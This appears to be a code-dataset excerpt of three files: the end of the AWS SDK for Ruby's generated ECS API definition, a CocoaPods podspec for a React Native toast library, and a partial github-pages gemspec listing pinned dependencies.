TaskDefinitionPlacementConstraint.struct_class = Types::TaskDefinitionPlacementConstraint
TaskDefinitionPlacementConstraints.member = Shapes::ShapeRef.new(shape: TaskDefinitionPlacementConstraint)
TaskOverride.add_member(:container_overrides, Shapes::ShapeRef.new(shape: ContainerOverrides, location_name: "containerOverrides"))
TaskOverride.add_member(:task_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskRoleArn"))
TaskOverride.add_member(:execution_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "executionRoleArn"))
TaskOverride.struct_class = Types::TaskOverride
Tasks.member = Shapes::ShapeRef.new(shape: Task)
Tmpfs.add_member(:container_path, Shapes::ShapeRef.new(shape: String, required: true, location_name: "containerPath"))
Tmpfs.add_member(:size, Shapes::ShapeRef.new(shape: Integer, required: true, location_name: "size"))
Tmpfs.add_member(:mount_options, Shapes::ShapeRef.new(shape: StringList, location_name: "mountOptions"))
Tmpfs.struct_class = Types::Tmpfs
TmpfsList.member = Shapes::ShapeRef.new(shape: Tmpfs)
Ulimit.add_member(:name, Shapes::ShapeRef.new(shape: UlimitName, required: true, location_name: "name"))
Ulimit.add_member(:soft_limit, Shapes::ShapeRef.new(shape: Integer, required: true, location_name: "softLimit"))
Ulimit.add_member(:hard_limit, Shapes::ShapeRef.new(shape: Integer, required: true, location_name: "hardLimit"))
Ulimit.struct_class = Types::Ulimit
UlimitList.member = Shapes::ShapeRef.new(shape: Ulimit)
UpdateContainerAgentRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
UpdateContainerAgentRequest.add_member(:container_instance, Shapes::ShapeRef.new(shape: String, required: true, location_name: "containerInstance"))
UpdateContainerAgentRequest.struct_class = Types::UpdateContainerAgentRequest
UpdateContainerAgentResponse.add_member(:container_instance, Shapes::ShapeRef.new(shape: ContainerInstance, location_name: "containerInstance"))
UpdateContainerAgentResponse.struct_class = Types::UpdateContainerAgentResponse
UpdateContainerInstancesStateRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
UpdateContainerInstancesStateRequest.add_member(:container_instances, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "containerInstances"))
UpdateContainerInstancesStateRequest.add_member(:status, Shapes::ShapeRef.new(shape: ContainerInstanceStatus, required: true, location_name: "status"))
UpdateContainerInstancesStateRequest.struct_class = Types::UpdateContainerInstancesStateRequest
UpdateContainerInstancesStateResponse.add_member(:container_instances, Shapes::ShapeRef.new(shape: ContainerInstances, location_name: "containerInstances"))
UpdateContainerInstancesStateResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
UpdateContainerInstancesStateResponse.struct_class = Types::UpdateContainerInstancesStateResponse
UpdateServiceRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
UpdateServiceRequest.add_member(:service, Shapes::ShapeRef.new(shape: String, required: true, location_name: "service"))
UpdateServiceRequest.add_member(:desired_count, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "desiredCount"))
UpdateServiceRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, location_name: "taskDefinition"))
UpdateServiceRequest.add_member(:deployment_configuration, Shapes::ShapeRef.new(shape: DeploymentConfiguration, location_name: "deploymentConfiguration"))
UpdateServiceRequest.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
UpdateServiceRequest.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
UpdateServiceRequest.add_member(:force_new_deployment, Shapes::ShapeRef.new(shape: Boolean, location_name: "forceNewDeployment"))
UpdateServiceRequest.add_member(:health_check_grace_period_seconds, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "healthCheckGracePeriodSeconds"))
UpdateServiceRequest.struct_class = Types::UpdateServiceRequest
UpdateServiceResponse.add_member(:service, Shapes::ShapeRef.new(shape: Service, location_name: "service"))
UpdateServiceResponse.struct_class = Types::UpdateServiceResponse
VersionInfo.add_member(:agent_version, Shapes::ShapeRef.new(shape: String, location_name: "agentVersion"))
VersionInfo.add_member(:agent_hash, Shapes::ShapeRef.new(shape: String, location_name: "agentHash"))
VersionInfo.add_member(:docker_version, Shapes::ShapeRef.new(shape: String, location_name: "dockerVersion"))
VersionInfo.struct_class = Types::VersionInfo
Volume.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
Volume.add_member(:host, Shapes::ShapeRef.new(shape: HostVolumeProperties, location_name: "host"))
Volume.struct_class = Types::Volume
VolumeFrom.add_member(:source_container, Shapes::ShapeRef.new(shape: String, location_name: "sourceContainer"))
VolumeFrom.add_member(:read_only, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "readOnly"))
VolumeFrom.struct_class = Types::VolumeFrom
VolumeFromList.member = Shapes::ShapeRef.new(shape: VolumeFrom)
VolumeList.member = Shapes::ShapeRef.new(shape: Volume)
# @api private
API = Seahorse::Model::Api.new.tap do |api|
api.version = "2014-11-13"
api.metadata = {
"endpointPrefix" => "ecs",
"jsonVersion" => "1.1",
"protocol" => "json",
"serviceFullName" => "Amazon EC2 Container Service",
"signatureVersion" => "v4",
"targetPrefix" => "AmazonEC2ContainerServiceV20141113",
}
api.add_operation(:create_cluster, Seahorse::Model::Operation.new.tap do |o|
o.name = "CreateCluster"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: CreateClusterRequest)
o.output = Shapes::ShapeRef.new(shape: CreateClusterResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:create_service, Seahorse::Model::Operation.new.tap do |o|
o.name = "CreateService"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: CreateServiceRequest)
o.output = Shapes::ShapeRef.new(shape: CreateServiceResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: UnsupportedFeatureException)
o.errors << Shapes::ShapeRef.new(shape: PlatformUnknownException)
o.errors << Shapes::ShapeRef.new(shape: PlatformTaskDefinitionIncompatibilityException)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
end)
api.add_operation(:delete_attributes, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeleteAttributes"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DeleteAttributesRequest)
o.output = Shapes::ShapeRef.new(shape: DeleteAttributesResponse)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: TargetNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:delete_cluster, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeleteCluster"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DeleteClusterRequest)
o.output = Shapes::ShapeRef.new(shape: DeleteClusterResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ClusterContainsContainerInstancesException)
o.errors << Shapes::ShapeRef.new(shape: ClusterContainsServicesException)
o.errors << Shapes::ShapeRef.new(shape: ClusterContainsTasksException)
end)
api.add_operation(:delete_service, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeleteService"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DeleteServiceRequest)
o.output = Shapes::ShapeRef.new(shape: DeleteServiceResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceNotFoundException)
end)
api.add_operation(:deregister_container_instance, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeregisterContainerInstance"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DeregisterContainerInstanceRequest)
o.output = Shapes::ShapeRef.new(shape: DeregisterContainerInstanceResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:deregister_task_definition, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeregisterTaskDefinition"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DeregisterTaskDefinitionRequest)
o.output = Shapes::ShapeRef.new(shape: DeregisterTaskDefinitionResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:describe_clusters, Seahorse::Model::Operation.new.tap do |o|
o.name = "DescribeClusters"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DescribeClustersRequest)
o.output = Shapes::ShapeRef.new(shape: DescribeClustersResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:describe_container_instances, Seahorse::Model::Operation.new.tap do |o|
o.name = "DescribeContainerInstances"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DescribeContainerInstancesRequest)
o.output = Shapes::ShapeRef.new(shape: DescribeContainerInstancesResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:describe_services, Seahorse::Model::Operation.new.tap do |o|
o.name = "DescribeServices"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DescribeServicesRequest)
o.output = Shapes::ShapeRef.new(shape: DescribeServicesResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:describe_task_definition, Seahorse::Model::Operation.new.tap do |o|
o.name = "DescribeTaskDefinition"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DescribeTaskDefinitionRequest)
o.output = Shapes::ShapeRef.new(shape: DescribeTaskDefinitionResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:describe_tasks, Seahorse::Model::Operation.new.tap do |o|
o.name = "DescribeTasks"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DescribeTasksRequest)
o.output = Shapes::ShapeRef.new(shape: DescribeTasksResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:discover_poll_endpoint, Seahorse::Model::Operation.new.tap do |o|
o.name = "DiscoverPollEndpoint"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: DiscoverPollEndpointRequest)
o.output = Shapes::ShapeRef.new(shape: DiscoverPollEndpointResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
end)
api.add_operation(:list_attributes, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListAttributes"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListAttributesRequest)
o.output = Shapes::ShapeRef.new(shape: ListAttributesResponse)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:list_clusters, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListClusters"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListClustersRequest)
o.output = Shapes::ShapeRef.new(shape: ListClustersResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:list_container_instances, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListContainerInstances"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListContainerInstancesRequest)
o.output = Shapes::ShapeRef.new(shape: ListContainerInstancesResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:list_services, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListServices"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListServicesRequest)
o.output = Shapes::ShapeRef.new(shape: ListServicesResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:list_task_definition_families, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListTaskDefinitionFamilies"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListTaskDefinitionFamiliesRequest)
o.output = Shapes::ShapeRef.new(shape: ListTaskDefinitionFamiliesResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:list_task_definitions, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListTaskDefinitions"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListTaskDefinitionsRequest)
o.output = Shapes::ShapeRef.new(shape: ListTaskDefinitionsResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:list_tasks, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListTasks"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: ListTasksRequest)
o.output = Shapes::ShapeRef.new(shape: ListTasksResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceNotFoundException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:put_attributes, Seahorse::Model::Operation.new.tap do |o|
o.name = "PutAttributes"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: PutAttributesRequest)
o.output = Shapes::ShapeRef.new(shape: PutAttributesResponse)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: TargetNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: AttributeLimitExceededException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:register_container_instance, Seahorse::Model::Operation.new.tap do |o|
o.name = "RegisterContainerInstance"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: RegisterContainerInstanceRequest)
o.output = Shapes::ShapeRef.new(shape: RegisterContainerInstanceResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:register_task_definition, Seahorse::Model::Operation.new.tap do |o|
o.name = "RegisterTaskDefinition"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: RegisterTaskDefinitionRequest)
o.output = Shapes::ShapeRef.new(shape: RegisterTaskDefinitionResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
end)
api.add_operation(:run_task, Seahorse::Model::Operation.new.tap do |o|
o.name = "RunTask"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: RunTaskRequest)
o.output = Shapes::ShapeRef.new(shape: RunTaskResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: UnsupportedFeatureException)
o.errors << Shapes::ShapeRef.new(shape: PlatformUnknownException)
o.errors << Shapes::ShapeRef.new(shape: PlatformTaskDefinitionIncompatibilityException)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
o.errors << Shapes::ShapeRef.new(shape: BlockedException)
end)
api.add_operation(:start_task, Seahorse::Model::Operation.new.tap do |o|
o.name = "StartTask"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: StartTaskRequest)
o.output = Shapes::ShapeRef.new(shape: StartTaskResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:stop_task, Seahorse::Model::Operation.new.tap do |o|
o.name = "StopTask"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: StopTaskRequest)
o.output = Shapes::ShapeRef.new(shape: StopTaskResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:submit_container_state_change, Seahorse::Model::Operation.new.tap do |o|
o.name = "SubmitContainerStateChange"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: SubmitContainerStateChangeRequest)
o.output = Shapes::ShapeRef.new(shape: SubmitContainerStateChangeResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
end)
api.add_operation(:submit_task_state_change, Seahorse::Model::Operation.new.tap do |o|
o.name = "SubmitTaskStateChange"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: SubmitTaskStateChangeRequest)
o.output = Shapes::ShapeRef.new(shape: SubmitTaskStateChangeResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
end)
api.add_operation(:update_container_agent, Seahorse::Model::Operation.new.tap do |o|
o.name = "UpdateContainerAgent"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: UpdateContainerAgentRequest)
o.output = Shapes::ShapeRef.new(shape: UpdateContainerAgentResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: UpdateInProgressException)
o.errors << Shapes::ShapeRef.new(shape: NoUpdateAvailableException)
o.errors << Shapes::ShapeRef.new(shape: MissingVersionException)
end)
api.add_operation(:update_container_instances_state, Seahorse::Model::Operation.new.tap do |o|
o.name = "UpdateContainerInstancesState"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: UpdateContainerInstancesStateRequest)
o.output = Shapes::ShapeRef.new(shape: UpdateContainerInstancesStateResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
end)
api.add_operation(:update_service, Seahorse::Model::Operation.new.tap do |o|
o.name = "UpdateService"
o.http_method = "POST"
o.http_request_uri = "/"
o.input = Shapes::ShapeRef.new(shape: UpdateServiceRequest)
o.output = Shapes::ShapeRef.new(shape: UpdateServiceResponse)
o.errors << Shapes::ShapeRef.new(shape: ServerException)
o.errors << Shapes::ShapeRef.new(shape: ClientException)
o.errors << Shapes::ShapeRef.new(shape: InvalidParameterException)
o.errors << Shapes::ShapeRef.new(shape: ClusterNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceNotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ServiceNotActiveException)
o.errors << Shapes::ShapeRef.new(shape: PlatformUnknownException)
o.errors << Shapes::ShapeRef.new(shape: PlatformTaskDefinitionIncompatibilityException)
o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
end)
end
end
end
| 72.701175 | 175 | 0.768863 |
111ef0505b1f0ee13c13bef0f418b250cdcbef7a | 559 | require "json"
package = JSON.parse(File.read(File.join(__dir__, "package.json")))
Pod::Spec.new do |s|
s.name = "selleo-toast"
s.version = package["version"]
s.summary = package["description"]
s.homepage = package["homepage"]
s.license = package["license"]
s.authors = package["author"]
s.platforms = { :ios => "10.0" }
s.source = { :git => "https://github.com/bartoszboruta/selleo-toast.git", :tag => "#{s.version}" }
s.source_files = "ios/**/*.{h,m,mm,swift}"
s.dependency "React-Core"
end
| 27.95 | 106 | 0.592129 |
623163c79b52d995c8234f2658dd056a4d806931 | 7,420 | # -*- encoding: utf-8 -*-
# stub: github-pages 215 ruby lib
Gem::Specification.new do |s|
s.name = "github-pages".freeze
s.version = "215"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["GitHub, Inc.".freeze]
s.date = "2021-05-24"
s.description = "Bootstrap the GitHub Pages Jekyll environment locally.".freeze
s.email = "[email protected]".freeze
s.executables = ["github-pages".freeze]
s.files = ["bin/github-pages".freeze]
s.homepage = "https://github.com/github/pages-gem".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.3.0".freeze)
s.rubygems_version = "3.1.2".freeze
s.summary = "Track GitHub Pages dependencies.".freeze
s.installed_by_version = "3.1.2" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<jekyll>.freeze, ["= 3.9.0"])
s.add_runtime_dependency(%q<jekyll-sass-converter>.freeze, ["= 1.5.2"])
s.add_runtime_dependency(%q<kramdown>.freeze, ["= 2.3.1"])
s.add_runtime_dependency(%q<kramdown-parser-gfm>.freeze, ["= 1.1.0"])
s.add_runtime_dependency(%q<jekyll-commonmark-ghpages>.freeze, ["= 0.1.6"])
s.add_runtime_dependency(%q<liquid>.freeze, ["= 4.0.3"])
s.add_runtime_dependency(%q<rouge>.freeze, ["= 3.26.0"])
s.add_runtime_dependency(%q<github-pages-health-check>.freeze, ["= 1.17.2"])
s.add_runtime_dependency(%q<jekyll-redirect-from>.freeze, ["= 0.16.0"])
s.add_runtime_dependency(%q<jekyll-sitemap>.freeze, ["= 1.4.0"])
s.add_runtime_dependency(%q<jekyll-feed>.freeze, ["= 0.15.1"])
s.add_runtime_dependency(%q<jekyll-gist>.freeze, ["= 1.5.0"])
s.add_runtime_dependency(%q<jekyll-paginate>.freeze, ["= 1.1.0"])
s.add_runtime_dependency(%q<jekyll-coffeescript>.freeze, ["= 1.1.1"])
s.add_runtime_dependency(%q<jekyll-seo-tag>.freeze, ["= 2.7.1"])
s.add_runtime_dependency(%q<jekyll-github-metadata>.freeze, ["= 2.13.0"])
s.add_runtime_dependency(%q<jekyll-avatar>.freeze, ["= 0.7.0"])
s.add_runtime_dependency(%q<jekyll-remote-theme>.freeze, ["= 0.4.3"])
s.add_runtime_dependency(%q<jemoji>.freeze, ["= 0.12.0"])
s.add_runtime_dependency(%q<jekyll-mentions>.freeze, ["= 1.6.0"])
s.add_runtime_dependency(%q<jekyll-relative-links>.freeze, ["= 0.6.1"])
s.add_runtime_dependency(%q<jekyll-optional-front-matter>.freeze, ["= 0.3.2"])
s.add_runtime_dependency(%q<jekyll-readme-index>.freeze, ["= 0.3.0"])
s.add_runtime_dependency(%q<jekyll-default-layout>.freeze, ["= 0.1.4"])
s.add_runtime_dependency(%q<jekyll-titles-from-headings>.freeze, ["= 0.5.3"])
s.add_runtime_dependency(%q<jekyll-swiss>.freeze, ["= 1.0.0"])
s.add_runtime_dependency(%q<minima>.freeze, ["= 2.5.1"])
s.add_runtime_dependency(%q<jekyll-theme-primer>.freeze, ["= 0.5.4"])
s.add_runtime_dependency(%q<jekyll-theme-architect>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-cayman>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-dinky>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-hacker>.freeze, ["= 0.1.2"])
s.add_runtime_dependency(%q<jekyll-theme-leap-day>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-merlot>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-midnight>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-minimal>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-modernist>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-slate>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-tactile>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-time-machine>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<mercenary>.freeze, ["~> 0.3"])
s.add_runtime_dependency(%q<nokogiri>.freeze, [">= 1.10.4", "< 2.0"])
s.add_runtime_dependency(%q<terminal-table>.freeze, ["~> 1.4"])
s.add_development_dependency(%q<jekyll_test_plugin_malicious>.freeze, ["~> 0.2"])
s.add_development_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_development_dependency(%q<rspec>.freeze, ["~> 3.3"])
s.add_development_dependency(%q<rubocop-github>.freeze, ["= 0.16.0"])
else
s.add_dependency(%q<jekyll>.freeze, ["= 3.9.0"])
s.add_dependency(%q<jekyll-sass-converter>.freeze, ["= 1.5.2"])
s.add_dependency(%q<kramdown>.freeze, ["= 2.3.1"])
s.add_dependency(%q<kramdown-parser-gfm>.freeze, ["= 1.1.0"])
s.add_dependency(%q<jekyll-commonmark-ghpages>.freeze, ["= 0.1.6"])
s.add_dependency(%q<liquid>.freeze, ["= 4.0.3"])
s.add_dependency(%q<rouge>.freeze, ["= 3.26.0"])
s.add_dependency(%q<github-pages-health-check>.freeze, ["= 1.17.2"])
s.add_dependency(%q<jekyll-redirect-from>.freeze, ["= 0.16.0"])
s.add_dependency(%q<jekyll-sitemap>.freeze, ["= 1.4.0"])
s.add_dependency(%q<jekyll-feed>.freeze, ["= 0.15.1"])
s.add_dependency(%q<jekyll-gist>.freeze, ["= 1.5.0"])
s.add_dependency(%q<jekyll-paginate>.freeze, ["= 1.1.0"])
s.add_dependency(%q<jekyll-coffeescript>.freeze, ["= 1.1.1"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["= 2.7.1"])
s.add_dependency(%q<jekyll-github-metadata>.freeze, ["= 2.13.0"])
s.add_dependency(%q<jekyll-avatar>.freeze, ["= 0.7.0"])
s.add_dependency(%q<jekyll-remote-theme>.freeze, ["= 0.4.3"])
